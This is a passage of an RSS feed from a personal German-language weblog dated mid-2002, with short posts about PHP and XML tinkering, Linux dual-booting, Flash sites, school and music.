  17572.    <content:encoded><![CDATA[Auf <a href="" target="_blank"><b></b></a> hat es verschiedene PHP-Klassen, unter anderem auch zum Thema XML/RSS. Vielleicht kann der/die eine oder andere etwas davon für seinen Weblog brauchen (mir ist's so ergangen) :-)
  17573. ]]></content:encoded>
  17574.  </item>
  17576.  <item>
  17577.    <title>«Wer alle Ziele erreicht, hat sie zu tief gesetzt.»</title>
  17578.    <link></link>
  17579.    <guid isPermaLink="true"></guid>
  17580.    <dc:creator>Andreas Jaggi</dc:creator>
  17581.    <creativeCommons:license></creativeCommons:license>
  17582.    <pubDate>Sun, 07 Jul 2002 16:59:00 +0200</pubDate>
  17583.    <category domain="">Tech</category>
  17584.    <description><![CDATA[Nach diesem Motto lebt der Betreiber <a href="" target="_blank"><b>dieser</b> Website</a>. Dort findet man einen "öffentlichen und für jedermann/frau zugänglichen Wissensspeicher".<br>IMHO gute und aktuelle Artikel. Unbedingt besuchen, hat für jeden etwas.
  17585. ]]></description>
  17586.    <content:encoded><![CDATA[Nach diesem Motto lebt der Betreiber <a href="" target="_blank"><b>dieser</b> Website</a>. Dort findet man einen "öffentlichen und für jedermann/frau zugänglichen Wissensspeicher".<br>IMHO gute und aktuelle Artikel. Unbedingt besuchen, hat für jeden etwas.
  17587. ]]></content:encoded>
  17588.  </item>
  17590.  <item>
  17591.    <title>Schliesslich hab ich Ferien...</title>
  17592.    <link></link>
  17593.    <guid isPermaLink="true"></guid>
  17594.    <dc:creator>Andreas Jaggi</dc:creator>
  17595.    <creativeCommons:license></creativeCommons:license>
  17596.    <pubDate>Sat, 06 Jul 2002 10:01:00 +0200</pubDate>
  17597.    <category domain="">Misc</category>
  17598.    <description><![CDATA[<br><a href="" target="_blank"><img src="" alt="ich bin zu 100% faul" style="border: 1px solid #000000;"></a>
  17599. ]]></description>
  17600.    <content:encoded><![CDATA[<br><a href="" target="_blank"><img src="" alt="ich bin zu 100% faul" style="border: 1px solid #000000;"></a>
  17601. ]]></content:encoded>
  17602.  </item>
  17604.  <item>
  17605.    <title>Projektwoche</title>
  17606.    <link></link>
  17607.    <guid isPermaLink="true"></guid>
  17608.    <dc:creator>Andreas Jaggi</dc:creator>
  17609.    <creativeCommons:license></creativeCommons:license>
  17610.    <pubDate>Mon, 01 Jul 2002 07:56:00 +0200</pubDate>
  17611.    <category domain="">Misc</category>
  17612.    <description><![CDATA[Nun ist es soweit. Wie schon <a href="">angekündigt</a>, beginnt heute die Projektwoche unserer Schule. Dazu dürfen wir heute mit dem Fahrrad <a href="" target="_blank"><b>dahin</b></a> radeln.<br>Leider sieht es so aus, dass ich während dieser Zeit nicht ins Internet kann -> kein Weblog. <b>:-(</b>
  17613. ]]></description>
  17614.    <content:encoded><![CDATA[Nun ist es soweit. Wie schon <a href="">angekündigt</a>, beginnt heute die Projektwoche unserer Schule. Dazu dürfen wir heute mit dem Fahrrad <a href="" target="_blank"><b>dahin</b></a> radeln.<br>Leider sieht es so aus, dass ich während dieser Zeit nicht ins Internet kann -> kein Weblog. <b>:-(</b>
  17615. ]]></content:encoded>
  17616.  </item>
  17618.  <item>
  17619.    <title>Linux</title>
  17620.    <link></link>
  17621.    <guid isPermaLink="true"></guid>
  17622.    <dc:creator>Andreas Jaggi</dc:creator>
  17623.    <creativeCommons:license></creativeCommons:license>
  17624.    <pubDate>Sun, 30 Jun 2002 03:19:00 +0200</pubDate>
  17625.    <category domain="">Linux</category>
  17626.    <description><![CDATA[<a href="" target="_blank"><b>icepack linux 2</b></a> nennt sich die Distribution, welche es geschafft hat neben meinem Win2k auf der selben Platte installiert zu werden. Massgebend dazu beigetragen hat der benutzerfreundliche GUI-Installationsmanager mit einem Partitionsmanager mit schon fast <a href="" target="_blank"><b>Partition Magic</b></a> ähnlichen Funktionen.<br>Damit habe ich für mein Dualboot-System eine NTFS-Partition zur gemeinsamen Nutzung erstellt. Nun will aber Linux unter keinen Umständen darauf schreiben können. Weiss vielleicht gerade jemand wie man dieses "readonly" Zeugs wegmachen kann?<br>Zu diesem Anlass gibt es natürlich auch einen <a href=""><b>Screenshot</b></a>.
  17627. ]]></description>
  17628.    <content:encoded><![CDATA[<a href="" target="_blank"><b>icepack linux 2</b></a> nennt sich die Distribution, welche es geschafft hat neben meinem Win2k auf der selben Platte installiert zu werden. Massgebend dazu beigetragen hat der benutzerfreundliche GUI-Installationsmanager mit einem Partitionsmanager mit schon fast <a href="" target="_blank"><b>Partition Magic</b></a> ähnlichen Funktionen.<br>Damit habe ich für mein Dualboot-System eine NTFS-Partition zur gemeinsamen Nutzung erstellt. Nun will aber Linux unter keinen Umständen darauf schreiben können. Weiss vielleicht gerade jemand wie man dieses "readonly" Zeugs wegmachen kann?<br>Zu diesem Anlass gibt es natürlich auch einen <a href=""><b>Screenshot</b></a>.
  17629. ]]></content:encoded>
  17630.  </item>
  17632.  <item>
  17633.    <title>3D-Artwork</title>
  17634.    <link></link>
  17635.    <guid isPermaLink="true"></guid>
  17636.    <dc:creator>Andreas Jaggi</dc:creator>
  17637.    <creativeCommons:license></creativeCommons:license>
  17638.    <pubDate>Thu, 27 Jun 2002 19:30:00 +0200</pubDate>
  17639.    <category domain="">Webdesign</category>
  17640.    <description><![CDATA[Wundervolle virtuelle Welten findet man <a href="" target="_blank"><b>hier</b></a>, <a href="" target="_blank"><b>hier</b></a> und <a href="" target="_blank"><b>hier</b></a>.
  17641. ]]></description>
  17642.    <content:encoded><![CDATA[Wundervolle virtuelle Welten findet man <a href="" target="_blank"><b>hier</b></a>, <a href="" target="_blank"><b>hier</b></a> und <a href="" target="_blank"><b>hier</b></a>.
  17643. ]]></content:encoded>
  17644.  </item>
  17646.  <item>
  17647.    <title>Schlaf...</title>
  17648.    <link></link>
  17649.    <guid isPermaLink="true"></guid>
  17650.    <dc:creator>Andreas Jaggi</dc:creator>
  17651.    <creativeCommons:license></creativeCommons:license>
  17652.    <pubDate>Wed, 26 Jun 2002 23:54:00 +0200</pubDate>
  17653.    <category domain="">Misc</category>
  17654.    <description><![CDATA[Da ich wie schon <a href="">gesagt</a> in dieser Woche nichts mehr für die Schule
  17656. machen muss, ist bei mir ein (noch) ungedecktes Bedürfnis nach Schlaf und Erholung aufgekommen. Und da ich in den letzen
  17658. paar Wochen durchschnittlich weniger als <b>4</b> Stunden Schlaf gefunden habe, habe ich während der letzen Tage in meiner
  17660. Freizeit nur geschlafen. Seit dem Wochenende blieb mein Computer ausgeschaltet, die Aufgaben unerledigt und der Weblog wurde
  17662. auch nicht aktualisiert.<br>Das soll sich nun wieder bessern und dieser Eintrag ist der Anfang dazu. Leider sieht es aber in
  17664. nächster Zeit auch nicht allzugut aus, da ich nächste Woche im Zuge einer Projektwoche eine Woche <b>ohne</b> Internet
  17666. verbringen muss. <b>:-(</b><br>Bis dann, so hoffe ich wenigstens, wird dann auch mein Template basierendes Layout fertig
  17668. programmiert sein, was den Weblog noch etwas erweitern wird.
  17669. ]]></description>
  17670.    <content:encoded><![CDATA[Da ich wie schon <a href="">gesagt</a> in dieser Woche nichts mehr für die Schule
  17672. machen muss, ist bei mir ein (noch) ungedecktes Bedürfnis nach Schlaf und Erholung aufgekommen. Und da ich in den letzen
  17674. paar Wochen durchschnittlich weniger als <b>4</b> Stunden Schlaf gefunden habe, habe ich während der letzen Tage in meiner
  17676. Freizeit nur geschlafen. Seit dem Wochenende blieb mein Computer ausgeschaltet, die Aufgaben unerledigt und der Weblog wurde
  17678. auch nicht aktualisiert.<br>Das soll sich nun wieder bessern und dieser Eintrag ist der Anfang dazu. Leider sieht es aber in
  17680. nächster Zeit auch nicht allzugut aus, da ich nächste Woche im Zuge einer Projektwoche eine Woche <b>ohne</b> Internet
  17682. verbringen muss. <b>:-(</b><br>Bis dann, so hoffe ich wenigstens, wird dann auch mein Template basierendes Layout fertig
  17684. programmiert sein, was den Weblog noch etwas erweitern wird.
  17685. ]]></content:encoded>
  17686.  </item>
  17688.  <item>
  17689.    <title>LEGO</title>
  17690.    <link></link>
  17691.    <guid isPermaLink="true"></guid>
  17692.    <dc:creator>Andreas Jaggi</dc:creator>
  17693.    <creativeCommons:license></creativeCommons:license>
  17694.    <pubDate>Sat, 22 Jun 2002 16:07:00 +0200</pubDate>
  17695.    <category domain="">Misc</category>
  17696.    <description><![CDATA[Wieder einmal ein Selbstbildnis. (Die anderen findet man <a href="">hier</a> und <a href="">hier</a>)<br><img src="" height="269" width="155" alt="legoxway"><br>Diesmal gefunden bei <a href="" target="_blank"><b>Twaen</b></a> und hergestellt <a href="" target="_blank"><b>hier</b></a>.
  17697. ]]></description>
  17698.    <content:encoded><![CDATA[Wieder einmal ein Selbstbildnis. (Die anderen findet man <a href="">hier</a> und <a href="">hier</a>)<br><img src="" height="269" width="155" alt="legoxway"><br>Diesmal gefunden bei <a href="" target="_blank"><b>Twaen</b></a> und hergestellt <a href="" target="_blank"><b>hier</b></a>.
  17699. ]]></content:encoded>
  17700.  </item>
  17702.  <item>
  17703.    <title>Endlich...</title>
  17704.    <link></link>
  17705.    <guid isPermaLink="true"></guid>
  17706.    <dc:creator>Andreas Jaggi</dc:creator>
  17707.    <creativeCommons:license></creativeCommons:license>
  17708.    <pubDate>Sat, 22 Jun 2002 14:31:00 +0200</pubDate>
  17709.    <category domain="">Misc</category>
  17710.    <description><![CDATA[Gestern hatte ich meine <b>letze Probe dieses Schuljahrs</b> geschrieben. (Über Ehe-, Kinds-, Scheidungs-, Güter- und Erbrecht) Und ich hatte erst noch ein gutes Gefühl beim Probeschreiben. ;-)<br>Nun habe ich bis im August keine schulischen Anstrengungen mehr zu machen.<br><b>Yeehaw!</b><br>Leider muss ich nächste Woche noch einigermassen vernünftig die Schule besuchen, denn Notenschluss ist erst am 26.6. Aber dennoch: <b>Endlich Zeit</b> für alle Dinge, die ich während der letzten Wochen zurückstellen musste.
  17711. ]]></description>
  17712.    <content:encoded><![CDATA[Gestern hatte ich meine <b>letze Probe dieses Schuljahrs</b> geschrieben. (Über Ehe-, Kinds-, Scheidungs-, Güter- und Erbrecht) Und ich hatte erst noch ein gutes Gefühl beim Probeschreiben. ;-)<br>Nun habe ich bis im August keine schulischen Anstrengungen mehr zu machen.<br><b>Yeehaw!</b><br>Leider muss ich nächste Woche noch einigermassen vernünftig die Schule besuchen, denn Notenschluss ist erst am 26.6. Aber dennoch: <b>Endlich Zeit</b> für alle Dinge, die ich während der letzten Wochen zurückstellen musste.
  17713. ]]></content:encoded>
  17714.  </item>
  17716.  <item>
  17717.    <title>XML-Log</title>
  17718.    <link></link>
  17719.    <guid isPermaLink="true"></guid>
  17720.    <dc:creator>Andreas Jaggi</dc:creator>
  17721.    <creativeCommons:license></creativeCommons:license>
  17722.    <pubDate>Thu, 20 Jun 2002 23:22:00 +0200</pubDate>
  17723.    <category domain="">Coding</category>
  17724.    <description><![CDATA[Mit ein paar PHP-Scripts ist habe ich hier einen <b>XML</b> basierten <b>Referer-</b> und <b>User-Agent-Log</b> gebastelt.<br><b><a href="">Hier</a></b> kann man ihn herunterladen.
  17725. ]]></description>
  17726.    <content:encoded><![CDATA[Mit ein paar PHP-Scripts ist habe ich hier einen <b>XML</b> basierten <b>Referer-</b> und <b>User-Agent-Log</b> gebastelt.<br><b><a href="">Hier</a></b> kann man ihn herunterladen.
  17727. ]]></content:encoded>
  17728.  </item>
  17730.  <item>
  17731.    <title>"Lies es jetzt, kauf es nie"</title>
  17732.    <link></link>
  17733.    <guid isPermaLink="true"></guid>
  17734.    <dc:creator>Andreas Jaggi</dc:creator>
  17735.    <creativeCommons:license></creativeCommons:license>
  17736.    <pubDate>Tue, 18 Jun 2002 23:09:00 +0200</pubDate>
  17737.    <category domain="">Misc</category>
  17738.    <description><![CDATA[Habe heute Morgen nicht schlecht gestaunt, als ich in der Gratis-Zeitung <a href="" target="_blank"><b>20 Minuten</b></a> einen halbseitigen Artikel über die "Anti-Suhrkamp-Kampagne" unter der Rubrik Webpage gefunden habe. Nachdem das Thema in sämtlichen Weblogs und Tageszeitungen zur Genüge diskutiert wurde, wird es jetzt auch noch als <b>"Platzfüller"</b> in Gratiszeitungen verwendet.<br><a href="" target="_blank"><b>Hier</b></a> findet man den Link zur <a href="" target="_blank">Online-Version</a> des Artikels.<br>Dadurch wird <a href="" target="_blank"></a> noch einmal mehr Visits bekommen, soll's wohlbekommen. ;-)
  17739. ]]></description>
  17740.    <content:encoded><![CDATA[Habe heute Morgen nicht schlecht gestaunt, als ich in der Gratis-Zeitung <a href="" target="_blank"><b>20 Minuten</b></a> einen halbseitigen Artikel über die "Anti-Suhrkamp-Kampagne" unter der Rubrik Webpage gefunden habe. Nachdem das Thema in sämtlichen Weblogs und Tageszeitungen zur Genüge diskutiert wurde, wird es jetzt auch noch als <b>"Platzfüller"</b> in Gratiszeitungen verwendet.<br><a href="" target="_blank"><b>Hier</b></a> findet man den Link zur <a href="" target="_blank">Online-Version</a> des Artikels.<br>Dadurch wird <a href="" target="_blank"></a> noch einmal mehr Visits bekommen, soll's wohlbekommen. ;-)
  17741. ]]></content:encoded>
  17742.  </item>
  17744.  <item>
  17745.    <title>RSS + Fun</title>
  17746.    <link></link>
  17747.    <guid isPermaLink="true"></guid>
  17748.    <dc:creator>Andreas Jaggi</dc:creator>
  17749.    <creativeCommons:license></creativeCommons:license>
  17750.    <pubDate>Mon, 17 Jun 2002 00:12:00 +0200</pubDate>
  17751.    <category domain="">Misc</category>
  17752.    <description><![CDATA[Nach längerer und durchaus unterhaltsamer Bastelei liegt nun <a href=""><b>hier</b></a> ein RSS-Feed des x-log.<br>Ein unterhaltsamer und *lehrreicher* Flash-Film befindet sich <a href="#" target="_blank" class="gone"><b>hier</b></a>.<br>Via ICQ von Ramon
  17753. ]]></description>
  17754.    <content:encoded><![CDATA[Nach längerer und durchaus unterhaltsamer Bastelei liegt nun <a href=""><b>hier</b></a> ein RSS-Feed des x-log.<br>Ein unterhaltsamer und *lehrreicher* Flash-Film befindet sich <a href="#" target="_blank" class="gone"><b>hier</b></a>.<br>Via ICQ von Ramon
  17755. ]]></content:encoded>
  17756.  </item>
  17758.  <item>
  17759.    <title>Sicherheit geht vor!</title>
  17760.    <link></link>
  17761.    <guid isPermaLink="true"></guid>
  17762.    <dc:creator>Andreas Jaggi</dc:creator>
  17763.    <creativeCommons:license></creativeCommons:license>
  17764.    <pubDate>Sun, 16 Jun 2002 03:43:00 +0200</pubDate>
  17765.    <category domain="">Coding</category>
  17766.    <description><![CDATA[Aus reiner Lust an zufälligen Passwörtern habe ich ein kleines <a href="" target="_blank"><b>PHP-Script</b></a> geschrieben. Damit habe ich <a href="" target="_blank"><b>hier</b></a> sogar ein 8-Zeichen Passwort hingebracht, für das man <b>307</b> Jahre zum entschlüsseln braucht. ;-)<br>Hier noch der <a href="" target="_blank">Code</a>.
  17767. ]]></description>
  17768.    <content:encoded><![CDATA[Aus reiner Lust an zufälligen Passwörtern habe ich ein kleines <a href="" target="_blank"><b>PHP-Script</b></a> geschrieben. Damit habe ich <a href="" target="_blank"><b>hier</b></a> sogar ein 8-Zeichen Passwort hingebracht, für das man <b>307</b> Jahre zum entschlüsseln braucht. ;-)<br>Hier noch der <a href="" target="_blank">Code</a>.
  17769. ]]></content:encoded>
  17770.  </item>
  17772.  <item>
  17773.    <title>Registry-Spielerei</title>
  17774.    <link></link>
  17775.    <guid isPermaLink="true"></guid>
  17776.    <dc:creator>Andreas Jaggi</dc:creator>
  17777.    <creativeCommons:license></creativeCommons:license>
  17778.    <pubDate>Sun, 16 Jun 2002 02:22:00 +0200</pubDate>
  17779.    <category domain="">Tech</category>
  17780.    <description><![CDATA[<a href="" target="_blank">Hier</a> habe ich einen <a href="" target="_blank"><b>Artikel</b></a> gefunden, der erklärt, wie man den <a href="" target="_blank">User Agent String des Internet Explorers ändern kann</a>.
  17781. ]]></description>
  17782.    <content:encoded><![CDATA[<a href="" target="_blank">Hier</a> habe ich einen <a href="" target="_blank"><b>Artikel</b></a> gefunden, der erklärt, wie man den <a href="" target="_blank">User Agent String des Internet Explorers ändern kann</a>.
  17783. ]]></content:encoded>
  17784.  </item>
  17786.  <item>
  17787.    <title>XML-Gebastel</title>
  17788.    <link></link>
  17789.    <guid isPermaLink="true"></guid>
  17790.    <dc:creator>Andreas Jaggi</dc:creator>
  17791.    <creativeCommons:license></creativeCommons:license>
  17792.    <pubDate>Sat, 15 Jun 2002 03:22:00 +0200</pubDate>
  17793.    <category domain="">Coding</category>
  17794.    <description><![CDATA[Da ich mich gerade etwas in XML einarbeite, habe ich nun einen <b>XML-basierten PHP-Refererlog</b> geschrieben.<br><a href="" target="_self"><b>Hier</b></a> die HTML-Ausgabe, und <a href="" target="_self"><b>hier</b></a> die XML-Base.
  17795. ]]></description>
  17796.    <content:encoded><![CDATA[Da ich mich gerade etwas in XML einarbeite, habe ich nun einen <b>XML-basierten PHP-Refererlog</b> geschrieben.<br><a href="" target="_self"><b>Hier</b></a> die HTML-Ausgabe, und <a href="" target="_self"><b>hier</b></a> die XML-Base.
  17797. ]]></content:encoded>
  17798.  </item>
  17800.  <item>
  17801.    <title>Flash-Site</title>
  17802.    <link></link>
  17803.    <guid isPermaLink="true"></guid>
  17804.    <dc:creator>Andreas Jaggi</dc:creator>
  17805.    <creativeCommons:license></creativeCommons:license>
  17806.    <pubDate>Thu, 13 Jun 2002 19:12:00 +0200</pubDate>
  17807.    <category domain="">Webdesign</category>
  17808.    <description><![CDATA[Den <a href="" target="_blank"><b>Link</b></a> zu einer Website, die farblich völlig meinem Geschmack entspricht, habe ich <a href="" target="_blank"><b>hier</b></a> gefunden.
  17809. ]]></description>
  17810.    <content:encoded><![CDATA[Den <a href="" target="_blank"><b>Link</b></a> zu einer Website, die farblich völlig meinem Geschmack entspricht, habe ich <a href="" target="_blank"><b>hier</b></a> gefunden.
  17811. ]]></content:encoded>
  17812.  </item>
  17814.  <item>
  17815.    <title>Southpark</title>
  17816.    <link></link>
  17817.    <guid isPermaLink="true"></guid>
  17818.    <dc:creator>Andreas Jaggi</dc:creator>
  17819.    <creativeCommons:license></creativeCommons:license>
  17820.    <pubDate>Wed, 12 Jun 2002 19:15:00 +0200</pubDate>
  17821.    <category domain="">Misc</category>
  17822.    <description><![CDATA[Noch so ein idealisiertes Selbstbildnis.<br>(Das andere findet man <a href="" target="_self">hier</a>)<br><br><img src="" alt="Southpark Portrait" width="215" height="292"><br><br>Hergestellt <a href="" target="_blank"><b>hier</b></a>, gefunden via <a href="" target="_blank"><b>Tim</b></a> und <a href="" target="_blank"><b>Frederike</b></a>.
  17823. ]]></description>
  17824.    <content:encoded><![CDATA[Noch so ein idealisiertes Selbstbildnis.<br>(Das andere findet man <a href="" target="_self">hier</a>)<br><br><img src="" alt="Southpark Portrait" width="215" height="292"><br><br>Hergestellt <a href="" target="_blank"><b>hier</b></a>, gefunden via <a href="" target="_blank"><b>Tim</b></a> und <a href="" target="_blank"><b>Frederike</b></a>.
  17825. ]]></content:encoded>
  17826.  </item>
  17828.  <item>
  17829.    <title>Fireworks MX ist da!</title>
  17830.    <link></link>
  17831.    <guid isPermaLink="true"></guid>
  17832.    <dc:creator>Andreas Jaggi</dc:creator>
  17833.    <creativeCommons:license></creativeCommons:license>
  17834.    <pubDate>Wed, 12 Jun 2002 02:00:00 +0200</pubDate>
  17835.    <category domain="">Webdesign</category>
  17836.    <description><![CDATA[Die neue Version meines Graphikprogrammes erscheint und ich habs total verschlafen (liegt vermutlich am Stress der
  17838. Maturaarbeit).<br><br><a href="" target="_blank"><b>Macromedia</b></a> hat nun die MX
  17840. Produktversionen fertiggestellt. Hab gerade die Fireworks MX Trial-Version gesaugt. Die Auswirkungen werdet ihr sicher in
  17842. nächster Zeit sehen ;-)<br>BTW: Laut Macromedia hat <b>MX</b> keine spezielle Bedeutung; schaut man aber auf die um bis zu
  17844. 100$ gestiegenen Preise, so erscheint <b>More eXpensive</b> doch ziemlich realistisch ;-)
  17845. ]]></description>
  17846.    <content:encoded><![CDATA[Die neue Version meines Graphikprogrammes erscheint und ich habs total verschlafen (liegt vermutlich am Stress der
  17848. Maturaarbeit).<br><br><a href="" target="_blank"><b>Macromedia</b></a> hat nun die MX
  17850. Produktversionen fertiggestellt. Hab gerade die Fireworks MX Trial-Version gesaugt. Die Auswirkungen werdet ihr sicher in
  17852. nächster Zeit sehen ;-)<br>BTW: Laut Macromedia hat <b>MX</b> keine spezielle Bedeutung; schaut man aber auf die um bis zu
  17854. 100$ gestiegenen Preise, so erscheint <b>More eXpensive</b> doch ziemlich realistisch ;-)
  17855. ]]></content:encoded>
  17856.  </item>
  17858.  <item>
  17859.    <title></title>
  17860.    <link></link>
  17861.    <guid isPermaLink="true"></guid>
  17862.    <dc:creator>Andreas Jaggi</dc:creator>
  17863.    <creativeCommons:license></creativeCommons:license>
  17864.    <pubDate>Wed, 12 Jun 2002 00:49:00 +0200</pubDate>
  17865.    <category domain="">Coding</category>
  17866.    <description><![CDATA[Bei <a href="" target="_blank"></a> findet wann wie bei <a href="" target="_blank"></a> immer die aktuellsten Weblogs.<br>Um die Eintragung des eigenen Weblogs zu vereinfachen, hat <a href="" target="_blank"><b>Pepino</b></a> ein kleines <a href="" target="_blank"><b>PHP-Script</b></a> geschrieben.
  17867. ]]></description>
  17868.    <content:encoded><![CDATA[Bei <a href="" target="_blank"></a> findet wann wie bei <a href="" target="_blank"></a> immer die aktuellsten Weblogs.<br>Um die Eintragung des eigenen Weblogs zu vereinfachen, hat <a href="" target="_blank"><b>Pepino</b></a> ein kleines <a href="" target="_blank"><b>PHP-Script</b></a> geschrieben.
  17869. ]]></content:encoded>
  17870.  </item>
  17872.  <item>
  17873.    <title>Blogger Code</title>
  17874.    <link></link>
  17875.    <guid isPermaLink="true"></guid>
  17876.    <dc:creator>Andreas Jaggi</dc:creator>
  17877.    <creativeCommons:license></creativeCommons:license>
  17878.    <pubDate>Tue, 11 Jun 2002 17:20:00 +0200</pubDate>
  17879.    <category domain="">Misc</category>
  17880.    <description><![CDATA[Entdeckt und unverzüglich ausgefüllt: <a href="" target="_blank"><b>Blogger Code</b></a><br>Und das hier ist rausgekommen:<br><a href="#" class="gone" target="_blank">B1 d t++ k s++ u-- f i o x e l c</a>
  17881. ]]></description>
  17882.    <content:encoded><![CDATA[Entdeckt und unverzüglich ausgefüllt: <a href="" target="_blank"><b>Blogger Code</b></a><br>Und das hier ist rausgekommen:<br><a href="#" class="gone" target="_blank">B1 d t++ k s++ u-- f i o x e l c</a>
  17883. ]]></content:encoded>
  17884.  </item>
  17886.  <item>
  17887.    <title>CS im RL</title>
  17888.    <link></link>
  17889.    <guid isPermaLink="true"></guid>
  17890.    <dc:creator>Andreas Jaggi</dc:creator>
  17891.    <creativeCommons:license></creativeCommons:license>
  17892.    <pubDate>Sun, 09 Jun 2002 02:53:00 +0200</pubDate>
  17893.    <category domain="">Misc</category>
  17894.    <description><![CDATA[Jemandem der schon einmal <a href="" target="_blank">CS</a> gespielt hat, darf man <a href="" target="_blank"><b>das hier</b></a> auf keinen Fall vorenthalten!
  17895. ]]></description>
  17896.    <content:encoded><![CDATA[Jemandem der schon einmal <a href="" target="_blank">CS</a> gespielt hat, darf man <a href="" target="_blank"><b>das hier</b></a> auf keinen Fall vorenthalten!
  17897. ]]></content:encoded>
  17898.  </item>
  17900.  <item>
  17901.    <title>Paris</title>
  17902.    <link></link>
  17903.    <guid isPermaLink="true"></guid>
  17904.    <dc:creator>Andreas Jaggi</dc:creator>
  17905.    <creativeCommons:license></creativeCommons:license>
  17906.    <pubDate>Sun, 09 Jun 2002 00:42:00 +0200</pubDate>
  17907.    <category domain="">Misc</category>
  17908.    <description><![CDATA[Wieder einmal eine Website über meine <a href="" target="_blank"><b>Lieblingsstadt</b></a> gefunden.<br>
  17909. ]]></description>
  17910.    <content:encoded><![CDATA[Wieder einmal eine Website über meine <a href="" target="_blank"><b>Lieblingsstadt</b></a> gefunden.<br>
  17911. ]]></content:encoded>
  17912.  </item>
  17914.  <item>
  17915.    <title>f&#x26;ffff</title>
  17916.    <link></link>
  17917.    <guid isPermaLink="true"></guid>
  17918.    <dc:creator>Andreas Jaggi</dc:creator>
  17919.    <creativeCommons:license></creativeCommons:license>
  17920.    <pubDate>Sat, 08 Jun 2002 18:02:00 +0200</pubDate>
  17921.    <category domain="">Misc</category>
  17922.    <description><![CDATA[<i>1. Was war dein letzter penetrantester Ohrwurm ? Wie wurde er ausgelöst ?</i><br>
  17923. Momentan ist es <b>An Apple A Day</b> von <b>Le Hammond Inferno</b>. Entdeckt beim Webradio-hören (<a href="" target="_blank">Radio Free Virgin</a>, Channel Magestore Paris).<br>
  17924. <i>2. Welche Musik-CD hast du dir zuletzt gekauft ? Was verbindest du mit der CD ?</i><br>
  17925. Das war <b>des Visages des Figures</b> von <b><a href="">Noir Désir</a></b>. Damit verbinde ich vor allem die Erinnerung an eine wunderbare Woche in Paris.<br>
  17926. <i>3. Bei welchem Song würdest du dein Radiowecker am Liebsten an die Wand klatschen ?</i><br>
  17927. Bei vielen Songs; u.a. bei T.E.A.R.S, No Angels, Wonderwall ...<br>
  17928. <i>4. Bei welcher Musikgruppe/Musikrichtung gehst du total auf ?</i><br>
  17929. <b><a href="">Noir Désir</a></b><br>
  17930. <i>5. Zippel-Zappel- oder Rumpel-Pumpel-Musik ?</i><br>
  17931. Eher Rumpel-Pumpel, aber ab und zu auch mal Zippel-Zappel<br><br><a href="" target="_blank">fiene &amp; fünf fragen für freitag</a>
  17932. ]]></description>
  17933.    <content:encoded><![CDATA[<i>1. Was war dein letzter penetrantester Ohrwurm ? Wie wurde er ausgelöst ?</i><br>
  17934. Momentan ist es <b>An Apple A Day</b> von <b>Le Hammond Inferno</b>. Entdeckt beim Webradio-hören (<a href="" target="_blank">Radio Free Virgin</a>, Channel Magestore Paris).<br>
  17935. <i>2. Welche Musik-CD hast du dir zuletzt gekauft ? Was verbindest du mit der CD ?</i><br>
  17936. Das war <b>des Visages des Figures</b> von <b><a href="">Noir Désir</a></b>. Damit verbinde ich vor allem die Erinnerung an eine wunderbare Woche in Paris.<br>
  17937. <i>3. Bei welchem Song würdest du dein Radiowecker am Liebsten an die Wand klatschen ?</i><br>
  17938. Bei vielen Songs; u.a. bei T.E.A.R.S, No Angels, Wonderwall ...<br>
  17939. <i>4. Bei welcher Musikgruppe/Musikrichtung gehst du total auf ?</i><br>
  17940. <b><a href="">Noir Désir</a></b><br>
  17941. <i>5. Zippel-Zappel- oder Rumpel-Pumpel-Musik ?</i><br>
  17942. Eher Rumpel-Pumpel, aber ab und zu auch mal Zippel-Zappel<br><br><a href="" target="_blank">fiene &amp; fünf fragen für freitag</a>
  17943. ]]></content:encoded>
  17944.  </item>
  17946.  <item>
  17947.    <title>Flash</title>
  17948.    <link></link>
  17949.    <guid isPermaLink="true"></guid>
  17950.    <dc:creator>Andreas Jaggi</dc:creator>
  17951.    <creativeCommons:license></creativeCommons:license>
  17952.    <pubDate>Sat, 08 Jun 2002 17:26:00 +0200</pubDate>
  17953.    <category domain="">Webdesign</category>
  17954.    <description><![CDATA[Etwas <a href="" target="_blank"><b>wunderschönes ...</b></a>
  17955. ]]></description>
  17956.    <content:encoded><![CDATA[Etwas <a href="" target="_blank"><b>wunderschönes ...</b></a>
  17957. ]]></content:encoded>
  17958.  </item>
  17960.  <item>
  17961.    <title>Schule</title>
  17962.    <link></link>
  17963.    <guid isPermaLink="true"></guid>
  17964.    <dc:creator>Andreas Jaggi</dc:creator>
  17965.    <creativeCommons:license></creativeCommons:license>
  17966.    <pubDate>Sat, 08 Jun 2002 16:05:00 +0200</pubDate>
  17967.    <category domain="">Misc</category>
  17968.    <description><![CDATA[Letzte Woche war so richtig stressig. <b>Zwei</b> Referate und <b>drei</b> Proben. Durchschnittlich <b>drei</b> Stunden Schlaf! Nicht sonderbar verwunderlich, dass ich heute bis 13.30 Uhr geschlafen habe.<br>Hier noch zwei Erzeugnisse meiner Schlaflosigkeit:<br><br><b><a href="" target="_blank">Max Frisch - Santa Cruz</a></b><br><b><a href="" target="_blank">Friedrich Dürrenmatt</a></b><br>
  17969. ]]></description>
  17970.    <content:encoded><![CDATA[Letzte Woche war so richtig stressig. <b>Zwei</b> Referate und <b>drei</b> Proben. Durchschnittlich <b>drei</b> Stunden Schlaf! Nicht sonderbar verwunderlich, dass ich heute bis 13.30 Uhr geschlafen habe.<br>Hier noch zwei Erzeugnisse meiner Schlaflosigkeit:<br><br><b><a href="" target="_blank">Max Frisch - Santa Cruz</a></b><br><b><a href="" target="_blank">Friedrich Dürrenmatt</a></b><br>
  17971. ]]></content:encoded>
  17972.  </item>
  17974.  <item>
  17975.    <title>Flash-Sites</title>
  17976.    <link></link>
  17977.    <guid isPermaLink="true"></guid>
  17978.    <dc:creator>Andreas Jaggi</dc:creator>
  17979.    <creativeCommons:license></creativeCommons:license>
  17980.    <pubDate>Thu, 06 Jun 2002 23:34:00 +0200</pubDate>
  17981.    <category domain="">Webdesign</category>
  17982.    <description><![CDATA[Gerade so ins Auge gestochen sind mir:<br><br>
  17983. Verrücktes Design, aber trotzdem ansprechend: <a href="" target="_blank"><b></b></a><br>
  17984. Minimalistisches Layout: <a href="" target="_blank"><b></b></a><br>
  17985. Gewöhnungsbedürftig: <a href="" target="_blank"><b></b></a><br>
  17986. Technisch hochstehend: <a href="" target="_blank"><b></b></a>
  17987. ]]></description>
  17988.    <content:encoded><![CDATA[Gerade so ins Auge gestochen sind mir:<br><br>
  17989. Verrücktes Design, aber trotzdem ansprechend: <a href="" target="_blank"><b></b></a><br>
  17990. Minimalistisches Layout: <a href="" target="_blank"><b></b></a><br>
  17991. Gewöhnungsbedürftig: <a href="" target="_blank"><b></b></a><br>
  17992. Technisch hochstehend: <a href="" target="_blank"><b></b></a>
